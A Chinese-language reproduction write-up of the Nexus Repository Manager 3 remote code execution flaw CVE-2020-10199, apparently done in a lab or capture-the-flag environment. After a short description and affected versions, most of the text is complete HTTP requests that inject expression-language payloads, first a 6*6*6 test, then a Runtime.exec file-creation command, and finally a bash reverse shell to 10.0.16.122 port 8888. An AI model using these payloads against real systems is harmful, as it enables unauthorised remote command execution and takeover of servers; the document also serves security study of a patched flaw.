Bootstrap

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)

漏洞名称

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)
漏洞简述

​ 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。 此漏洞的利用需要攻击者具备任意类型的账号权限。
影响版本

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

漏洞复现

第一步:启动环境,可看到Web页面

 

该漏洞需要访问更新角色或创建角色接口,所以我们需要使用账号密码admin:admin登录后台

获取当前Cookie和CSRF Token:

第二步:brup抓包且构造如下数据包

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.179.162:42407
Content-Length: 233
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6472159469278993
Content-Type: application/json
Accept: */*
Origin: http://192.168.179.162:42407
Referer: http://192.168.179.162:42407/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6472159469278993; _ga=GA1.1.672464578.1686021722; _gid=GA1.1.1450571530.1686021722; _gcl_au=1.1.1882043501.1686021723; ln_or=eyIzOTIwOSI6ImQifQ%3D%3D; _uetsid=529a13d0041911ee8ed189b38c8ed7b5; _uetvid=529a79c0041911eea94f692ae4cd89ee; _ga_2TMM6KZPXQ=GS1.1.1686021737.1.0.1686021738.59.0.0; NXSESSIONID=a9033046-7d5a-4b99-945c-b1ef546337b9
Connection: close

{

    "name": "internal",

    "online": true,

    "storage": {

        "blobStoreName": "default",

        "strictContentTypeValidation": true

    },

    "group": {

    "memberNames": ["$\\A{6*6*6}"]

}

}

 把执行6*6*6修改为创建一个Nexus文件

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.179.162:42407
Content-Length: 233
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6472159469278993
Content-Type: application/json
Accept: */*
Origin: http://192.168.179.162:42407
Referer: http://192.168.179.162:42407/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6472159469278993; _ga=GA1.1.672464578.1686021722; _gid=GA1.1.1450571530.1686021722; _gcl_au=1.1.1882043501.1686021723; ln_or=eyIzOTIwOSI6ImQifQ%3D%3D; _uetsid=529a13d0041911ee8ed189b38c8ed7b5; _uetvid=529a79c0041911eea94f692ae4cd89ee; _ga_2TMM6KZPXQ=GS1.1.1686021737.1.0.1686021738.59.0.0; NXSESSIONID=a9033046-7d5a-4b99-945c-b1ef546337b9
Connection: close

{

    "name": "internal",

    "online": true,

    "storage": {

        "blobStoreName": "default",

        "strictContentTypeValidation": true

    },

    "group": {

    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/Nexus')}"]

}

}

 第三步:监听指定端口,执行反弹shell

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.179.162:42407
Content-Length: 233
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6472159469278993
Content-Type: application/json
Accept: */*
Origin: http://192.168.179.162:42407
Referer: http://192.168.179.162:42407/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6472159469278993; _ga=GA1.1.672464578.1686021722; _gid=GA1.1.1450571530.1686021722; _gcl_au=1.1.1882043501.1686021723; ln_or=eyIzOTIwOSI6ImQifQ%3D%3D; _uetsid=529a13d0041911ee8ed189b38c8ed7b5; _uetvid=529a79c0041911eea94f692ae4cd89ee; _ga_2TMM6KZPXQ=GS1.1.1686021737.1.0.1686021738.59.0.0; NXSESSIONID=a9033046-7d5a-4b99-945c-b1ef546337b9
Connection: close

{

    "name": "internal",

    "online": true,

    "storage": {

        "blobStoreName": "default",

        "strictContentTypeValidation": true

    },

    "group": {

    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/10.0.16.122/8888<&1')}"]

}

}

 第四步:查看flag

 

;